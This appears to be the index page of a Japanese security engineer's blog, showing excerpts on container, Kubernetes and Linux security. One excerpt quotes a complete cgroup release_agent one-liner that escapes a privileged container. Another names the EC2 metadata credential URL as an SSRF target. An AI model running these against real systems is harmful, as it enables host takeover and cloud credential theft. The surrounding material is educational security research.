はてなブックマーク

特定の外部ネットワークへの通信の制限にはファイアウォールなどを利用することが多いですが、コンテナや実行されたコマンド名などをもとに、通信を制御したいという需要が自分の中でありました。 具体的には GitHub Self-hosted runner のような CI / CD 環境で、依存パッケージに悪意あるコードが入り込んでしまうようなサプライチェーン攻撃などを検知・防御し、意図せずにクレデンシャルなどの秘匿すべき情報が外部に漏洩するのを防ぎたいと思っていました。 このようなサプライチェーン攻撃への対策は様々ですが、実行時に悪意のある動作を検出するものとして、GitLab が Falco をベースとした Package Hunter などがあります。このツールは依存パッケージなどをインストールする際に実行されるシステムコールなどを監視するものです。 検知するだけであれば Package Hu

私はパスワードやトークンなどを 1Password に保存しています。これらを環境変数として利用したい場合、クリップボードにコピーして set か export して環境変数にセットするか、頻繁に利用するものであれば envchain を利用していました。 envchain はとても便利なのですが、私は Mac と Linux、それから Windows もたまに使っているため、 keychain や Gnome Keyring でそれぞれ保存するのが手間に思っていました。どうせ 1Password に保存しているので、そこから取得してしまえば良いと思い、 openv というツールを作りました。 GitHub - mrtc0/openv: A tool that uses the credentials stored in 1password as an environment variab

この記事は GMO ペパボエンジニア Advent Calendar 2020 の12日目の記事です。 昨日は @takutaka さんの 「Kubernetes Custom Controller を手抜きで作る技術」でした。 CRD や Custom Controller を作る際に役立つ情報が載っていて良い記事ですね。 さて、最近私は Open Policy Agent を触ることが多いので、それについて書こうと思っていたのですが、せっかく会社の Advent Calendar なので少し業務でやったことを書こうと思います。 私は GMO ペパボのセキュリティ対策室という部署で、サービスを横断してセキュリティ対策の基盤作りをしています。 セキュリティ対策と一口に言っても、その内容は多岐にわたりますが、エンジニアのセキュリティレベルの向上支援も業務のひとつです。 例えば年に一度はセキュ

必要がなくなっている、というか特定の条件では CAP_NET_RAW は不要という話。 ある講義で Capability について話す機会があり、いつもどおり CAP_NET_RAW が必要な ping を使った実験をしていたところ、環境によっては CAP_NET_RAW File Capability を与えなくても ping が実行できることに気づき、少し調べてみました。 どうも随分前に net.ipv4.ping_group_range というカーネルパラメータが追加されていたらしく、これを設定することで ICMP ソケットを扱うグループを指定できるため、 CAP_NET_RAW や setuid なしで実行できるようになっていたようでした。 以下、調べたことを書いておきます。 ubuntu 18.04 では CAP_NET_RAW なしでは動かないのに対し、ubuntu 20.04

profs の hidepid オプションの値 procfs のマウントオプションに hidepid というオプションがあることを知った。 man で確認すると 0~3 の値を取るらしい。 hidepid=n (since Linux 3.3) This option controls who can access the information in /proc/[pid] directories. The argument, n, is one of the following values: 0 Everybody may access all /proc/[pid] directories. This is the traditional behavior, and the default if this mount option is not specified. 1 Users

追記 2020-05-13 この方法に問題があることをご指摘いただきました。本来関係ないクライアントがリソースサーバーにアクセスできる問題がありますので、取り急ぎこの方法は非推奨であることを書いておきます(では、どのようにすればいいのかというところをまた後日追記します)。 リソースサーバーと全く関係の無いクライアントが、全く関係のない文脈で正当に取得した ID トークンを用いて、リソースサーバーの API にアクセスできてしまうと思われます。リソース側が evil かどうかも関係なく、むしろリソースサーバーは騙される側ですね。図を参照してください。 pic.twitter.com/kKCZohOgu2 — Taka@Authlete, BaaS for OAuth 2.0 & OpenID Connect (@darutk) May 13, 2020 追記 2020-05-18 結論として

bpf や bcc 周りは使わないと忘れてしまうのでメモ。 Hello, World clang で bpf オブジェクトを作って C でそれを読み込む…という方法よりも https://github.com/iovisor/bcc/ を使う方が楽なので、bcc でやります。 C でやると環境作るところから大変なので… ref : https://blog.raymond.burkholder.net/index.php?/archives/1000-eBPF-Basics.html execve システムコールが呼ばれたときに Hello, World! と表示するプログラムを作ります。 from bcc import BPF bpf_text = """ #include <uapi/linux/ptrace.h> #include <linux/sched.h> #include <

FUSE が気になっていたので触ってみたメモ。 FUSE FUSE(Filesystem in Userspace) とは、ざっくり言えばユーザーランドで独自のファイルシステムを作れる機能を提供するソフトウェア。 人生において自作OSや自作言語、自作静的解析器等々、車輪の再開発を行いたいものは様々である。 自分が何も自作していないことに気づいて「人生とは…」となる。 そんな何も自作したことがない人でも FUSE を使うことでお手軽に自作ファイルシステムを作ることができる。 (まぁ後述するように実際はカーネルへの橋渡し的な実装を行うものなのでファイルシステムと呼んでいいかは微妙だが…) FUSE はどこで使われているか SSH先のディレクトリをマウントする SSHFS やGMailをファイルシステムとして扱える GMailfs などで利用されている。 ディレクトリやファイルの読み書きを実装す

Kubernetes での Pod のセキュリティ対策についてまとめる。 ここでは次の3点について書く。 securityContext で Pod をセキュアにする方法 SecurityContextDeny で securityContext を設定させない方法 PodSecurityPolicy を用いてクラスタ側で Pod をセキュアにする方法 いずれも securityContext / security policy による AttackSurface の制御方法について書いている。 securityContext Pod の Manifest で securityContext を指定することで、その Pod の Attack Surface を制御できる。 https://kubernetes.io/docs/tasks/configure-pod-container/se

元ネタ : https://twitter.com/_fel1x/status/1151487051986087936 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o — Felix Wilhelm (@_fel1x) July 17, 2019 特権( CAP_SYS_ADMIN )コンテナで cgr

Kubernetes のセキュリティ周りを調べていたので、そのメモです。 間違いや追加の情報があれば @mrtc0 までお願いします。 Kubernetes Version 1.14.4 ServiceAccount Token の Auto Mount を無効する ServiceAccount の token や証明書は Pod 内の /var/run/secrets/kubernetes.io/serviceaccounts/ 配下に自動でマウントされるようになっています。 もし Pod が侵害された場合は Kubernetes API を操作されることになります。 root@ubuntu:/var/run/secrets/kubernetes.io/serviceaccount# pwd /var/run/secrets/kubernetes.io/serviceaccount ro

Kubernetes でどのような操作が行われたか(audit)のログを取得する方法をメモ。 https://kubernetes.io/docs/tasks/debug-application-cluster/audit/ ここでは例として secrets リソースの audit ログを取得してみる。 1. Audit Policy を作成する。 apiVersion: audit.k8s.io/v1 kind: Policy omitStages: - "RequestReceived" rules: - level: Metadata resources: - group: "" resources: ["secrets"] - level: None

Linux に No New Privileges という、子プロセスが新しい特権を取得できないようにする仕組みがある。 https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/prctl.h> int main(int argc, char * argv[]) { if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) { return EXIT_FAILURE; } return execvp(argv[1], &argv[1]); }

引越しをして落ち着き始めました。一人暮らしの頃の家電を replace する作業をしている。 よろしくおねがいします。 https://www.amazon.jp/hz/wishlist/ls/QH63MJIX20EA?ref_=wl_share USDT がどのように動作するのかについて調べ、USDT と eBPF(bcc) を使って様々なことができることを知ったのでメモがてら。 まずは USDT (User Statically-Defined Tracing) について簡単に述べる。 USDT はユーザースペースで動作しているアプリケーションに対し、オーバーヘッドを小さく簡単にデバッグを可能とするものだ。 これは DTrace で使われている技術で、元々は Solaris でカーネルに Probe と呼ばれるものを挿入し、Probe を通過した時点でユーザースペースの関数がコールバッ

この記事はGMOペパボ Advent Calendar 2018の22日目の記事です(大遅刻)。 本当は今半期やってきた総括として、コンテナランタイムのセキュリティについて一からまとめたかったのですが、Linux Namespace の実装を読み始めたら迷子になってしまったので間に合いませんでした。 なので、今回は過去に見つかった AppArmor のバイパス方法を簡単にまとめようと思います。 2018/12/24 現在、最新版で修正されているものもあるし、されていないものもあります。 ここでは、以下の3つのバイパス方法を記します。 親ディレクトリを rename するバイパス shebang を利用したバイパス pivot_root を利用したバイパス ちなみに、それぞれのバグ報告の Issue リンクは記していますが、どのバージョンやコミットで修正されているかまでは記していません。面倒

ここで書く内容は blackhat USA 2017 で Orange Tsai 氏が発表した 「A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!」 で取り上げられていた内容を自分が改めて理解するために書き残したメモです。 概要 var base = "https://example.com/article/"; var path = req.query.path; if (path.indexOf("..") == -1) { http.get(base + path, callback); } 上記のようなコードのとき、 /?path=../passwd のようにアクセスして http.get() の処理に入り、 /article/../passwd を取得することはできるだろうか。

電気が送電されました！万歳！！ 9/8が誕生日なのでお待ちしております。 http://amzn.asia/azuF53V 先日、以下のような記事を見た。 EC2上のAWS CLIで使われている169.254について EC2では、インスタンス内から http://169.254.169.254/ にアクセスすると、そのインスタンスに関する情報が取得できるようになっている。 そのため、SSRF脆弱性が存在し、レスポンスをユーザーに表示しているような場合には、http://169.254.169.254/latest/meta-data/iam/security-credentials/ にアクセスされることで、AWSのクレデンシャルを不正に取得される。 SSRFについてはここでは解説しない。以下の記事などを参照してほしい。 What is Server Side Request Forger

夏休み突入でぇ～す！(CV: 門脇舞以) → 終了、了解！ 皆さんはネットワーク経由からローカルにファイルを作成せずに共有ライブラリを読み込みたいと思ったことはありませんか？ 僕はありません。 共有ライブラリのロード まずは普通に共有ライブラリをロードしてみる。以下のような共有ライブラリを用意する。 #include <stdio.h> void __attribute__ ((constructor)) hello_init(void); void hello_init(void) { fprintf(stdout,"[+] Hello!\n"); }

いつまで経っても親知らずが人間から失われないの、歯医者業界との癒着か？ strace は ptrace(2) でプロセスを監視することで呼び出されるシステムコールとその引数を表示している。 ここでは簡易的な strace を作成してシステムコールを表示してみる。 どのようにシステムコールを追いかけるか 今回は任意のプロセスにアタッチするのではなく、引数として与えた文字列を execvp してシステムコールを表示してみる。 システムコールを逐次表示していく手順としては以下のようになる。 fork(2) して子プロセスの中で execvp する。 子プロセスでは ptrace(PTRACE_TRACEME, 0, NULL, NULL) によって親プロセスでトレースを行わせる。 親プロセスでは waitpid で状態が変化するまで待ち、ptrace(PTRACE_GETREGS, pid, N

俺たちの夏休みはこれからだ！（今日が最終日） 前回は ptrace を使用して seccomp による制限を回避してみた 。 今回は seccomp とコンテナの関係、コンテナからホストへの break out についてのメモです。メモなので雑に書いています。 コンテナと seccomp LXC や Docker でも seccomp が利用されており、コンテナを break out する危険があるようなシステムコールを禁止している。 LXCでは非常に小さなポリシーとなっている(これとは別でどこかで自動生成されているのかな…?) https://github.com/lxc/lxc/blob/b96e9ae47aff9a722e1e900851a389b4dd0b4222/config/templates/common.seccomp 2 blacklist reject_force_um

夏休みに観る Netflix オススメ映画を募集しています。 PHP Extension で sha1() をフックして引数を表示するところまでやってみたのでメモ。 1. PHP Extension を作る準備 PHPのソースコード一式を落としてきてコンパイルする。 $ cd ext $ ./ext_skel --extname=hook Creating directory hook Creating basic files: config.m4 config.w32 .gitignore hook.c php_hook.h CREDITS EXPERIMENTAL tests/001.phpt hook.php [done]. To use your new extension, you will have to execute the following steps: 1. $ cd

機動戦士ガンダムユニコーン RE:0096を視聴したところ、感化されて Aimer を聴きながらユニコーンのガンプラを作って大変満足している。 Node.js の inspector モードで DNS Rebinding を利用した RCE (CVE-2018-7160) がどのようなものなのか手元で確認してみたのでメモ。 メモなのでかなり殴り書き。 Chrome DevTools Protocol CVE-2018-7160を理解する前に Chrome DevTools Protocol について知っておく必要があった。 Chrome DevTools Protocol を利用することで Blink ベースのブラウザのデバッグやら何やらが可能になる。 Headless Chrome での操作はすべて Chrome DevTools Protocol で制御され、その実体は WebSock

Oculus Go で目がヤバ。 概要 Docker には REST API があって、クライアントはそれを通してDockerを自在に操作できる。 「開発環境だから…」という気持ちで dockerd -H tcp://0.0.0.0:2376 みたいに動作させると、悪意あるサイトを閲覧するだけでコンテナの Shell が取られるみたいなことが発生するので、開発環境でも証明書を使った認証を行うなどしたほうが良い。 https://docs.docker.com/engine/security/https/ 悪用例 docker remote api tcp とかで検索すると以下のようなエントリがヒットする。 How do I enable the remote API for dockerd

proxysqlは通過したクエリをログとして残すことができる。 Query Logging · sysown/proxysql Wiki このログの実体はバイナリで、 proxysql に付属している tools/eventslog_reader_sample.cpp で読むことができる。 $ tools/eventslog_reader_sample /path/to/queris.log ProxySQL LOG QUERY: thread_id="2" username="root" schemaname=sampledb1" client="127.0.0.1:46392" HID=0 server="127.0.0.1:3306" starttime="2018-06-25 14:37:05.165436" endtime="2018-06-25 14:37:05.166352"

概要 Cookieに新たにSameSite属性というものが提案され、主要なブラウザで実装が進んでいる。 かつてはFirst-Party-Only Cookieと呼ばれていたもの。 https://tools.ietf.org/html/draft-west-first-party-cookies-05 クロスオリジンへのリクエスト送信時にCookieを付与しないことで、予期せぬ形での情報漏洩を緩和するのが目的。 CSRFを防げるという話ではなく、あくまで緩和という感じ。 このエントリを書いている段階で、Safari以外の主要ブラウザでは実装済みという感じ。 https://caniuse.com/#feat=same-site-cookie-attribute SameSite属性の値と挙動 値は lax と strict の2種類。 Set-Cookie: test=1; path=/;

サブドメインを動的に設定してリバースプロキシとして動作させ、LXCコンテナに振りたいなぁという要望が出たのでメモ。 Cybozuだとデータベースファイルを読み込んでやっているらしいが、ここではRedisを使ってみる。 NginxとLuaを用いた動的なリバースプロキシでデプロイを 100 倍速くした 動作イメージとしては以下のような感じ。 redisにはコンテナ名をkeyとして値にコンテナのIPアドレスが入っている。 Nginxの動作としては以下のような感じ。 container1.example.comにアクセス Redisにcontainer1というkeyがあればvalueであるIPアドレスに転送 container1というkeyがなければ404を返す 環境 openresty-1.11.2.4 dnsmasq redis 手順 何はともあれopenrestyをインストールする。 hos